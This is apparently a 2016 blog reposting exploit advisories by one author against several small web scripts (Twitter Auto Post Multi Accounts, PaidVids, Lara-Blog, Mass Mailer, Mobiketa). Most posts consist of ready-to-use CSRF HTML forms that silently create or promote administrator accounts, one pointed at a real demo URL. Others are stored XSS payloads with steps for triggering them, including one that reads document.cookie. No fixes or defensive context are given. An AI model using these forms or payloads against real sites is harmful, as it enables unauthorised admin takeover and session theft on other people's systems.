27 Haziran 2016 Pazartesi

Twitter Auto Post Multi Accounts - CSRF Add Admin Exploit

05:37 Posted by Unknown
<!--
# Exploit Title: Twitter Auto Post Multi Accounts - CSRF Add Admin Exploit
# Date: 09/06/2016
# Exploit Author: Murat YILMAZLAR
# Vendor Homepage: http://codecanyon.net/item/twitter-auto-post-multi-accounts/16794863?s_rank=1
# Demo Page: http://tw.cozola.com/
# Version: 1.0

# Exploit:

< -- bug code started -- >
-->

<html>
  <body>
    <form action="[SITE]/index.php/Users/postUpdate" method="POST">
      <input type="hidden" name="admin" value="1" />
      <input type="hidden" name="id" value="" />
      <input type="hidden" name="username" value="newadmin" />
      <input type="hidden" name="password" value="newpass" />
      <input type="hidden" name="repassword" value="newpass" />
      <input type="hidden" name="fid" value="hacked&#95;admin" />
      <input type="hidden" name="status" value="1" />
      <input type="hidden" name="token" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

<!--
< -- end of the bug code -- >

#########################

[+] Contact: http://twitter.com/muratyilmazlarr
-->

13 Haziran 2016 Pazartesi

PaidVids - Multiple Vulnerabilities

11:38 Posted by Unknown
# Exploit Title: PaidVids - Multiple Vulnerabilities
# Date: 11/06/2016
# Exploit Author: Murat YILMAZLAR
# Vendor Homepage: http://paidtasks.net/
# Demo Page: http://video.paidtasks.net/admin-panel/
# Version: 1.0


###########################

# CSRF Add Admin Exploit:

< -- bug code started -- >

<html>
  <body>
    <form action="http://video.paidtasks.net/admin-panel/index.php?x=users&edit=7" method="POST">
      <input type="hidden" name="username" value="murrat" />
      <input type="hidden" name="email" value="murrat&#64;protonmail&#
46;com" />
      <input type="hidden" name="pass" value="" />
      <input type="hidden" name="gender" value="1" />
      <input type="hidden" name="country" value="82" />
      <input type="hidden" name="coins" value="0&#46;20" />
      <input type="hidden" name="admin" value="1" />
      <input type="hidden" name="submit" value="Submit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

< -- end of the bug code -- >

###########################


# Stored XSS Vulnerability:

Paidvids is vulnerable to a stored XSS when an user is edited with an
malicious payload on the username field. The javascript payload is executed when another admin or editor tries to use the
"All Members" section from left bar.

# How To Exploit:

Go to the admin panel and edit a existed user. Change the "username" to :
"><img src="c" onerror="alert(document.cookie)">  after this, go to this members page.
Here is your alert.

PoC: http://prntscr.com/bew0df

###########################

Lara-Blog Stored XSS Vulnerability

11:38 Posted by Unknown
# Exploit Title: Lara-Blog Stored XSS Vulnerability
# Date: 11/06/2016
# Exploit Author: Murat YILMAZLAR
# Vendor Homepage: http://xcoder.io/demo/
# Demo Page: http://xcoder.io/demo/lara-blog/dashboard
# Version: 1.0

#########################

1. Vulnerability Summary:

Larablog is vulnerable to a stored XSS when an user is created with an
malicious payload on the Full name field.
The javascript payload is executed when another admin or editor tries to use the
"Users" section from left bar.

2. How to exploit:

Go to the admin panel and create a new user or edit a existed user. Change the "Full name" to :
"><img src="c" onerror="alert(document.
cookie)">  after this, go to the "Users" section or "Dashboard"
Here is your alert.

PoC: http://prntscr.com/bevbyh


3. Vulnerable Versions:

All versions of Lara-Blog is vulnerable for this bug.

#########################

Mass Mailer - Stored XSS Vuln.

11:38 Posted by Unknown
# Exploit Title: Mass Mailer Stored XSS Vuln.
# Date: 09/06/2016
# Exploit Author: Murat YILMAZLAR
# Vendor Homepage: http://www.brightery.com.eg/
# Demo Page: http://demo.brightery.com.eg/mass-mailer
# Version: 1.0

# Exploit:

< -- bug code started -- >

Go to the admin page. Add server from the top right menu. Use the payload: '"><svg/onload=confirm(
document.domain)>

And go to http://[SITE]/[script_path]/admin/servers

Here is your alert!

< -- end of the bug code -- >

#########################

12 Haziran 2016 Pazar

Mobiketa 1.0 - CSRF Add Admin Exploit

08:39 Posted by Unknown
<!--
# Exploit Title: Mobiketa - CSRF Add Admin Exploit
# Date: 09/06/2016
# Exploit Author: Murat YILMAZLAR
# Vendor Homepage: http://www.ynetinteractive.com/mobiketa/
# Version: 1.0

# Exploit:

< -- bug code started -- >
-->

<html>
  <body>
    <form action="[SITE]/[mobiketa_path]/index.php?url=user" method="POST"
enctype="multipart/form-data">
      <input type="hidden" name="is&#95;admin" value="1" />
      <input type="hidden" name="name" value="murat&#32;y" />
      <input type="hidden" name="email"
value="murrat&#64;protonmail&#46;com" />
      <input type="hidden" name="username" value="murrat" />
      <input type="hidden" name="password" value="123123123" />
      <input type="hidden" name="id" value="15" />
      <input type="hidden" name="update" value="&#13;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

<!--
< -- end of the bug code -- >

#########################

[+] Contact: http://twitter.com/muratyilmazlarr
-->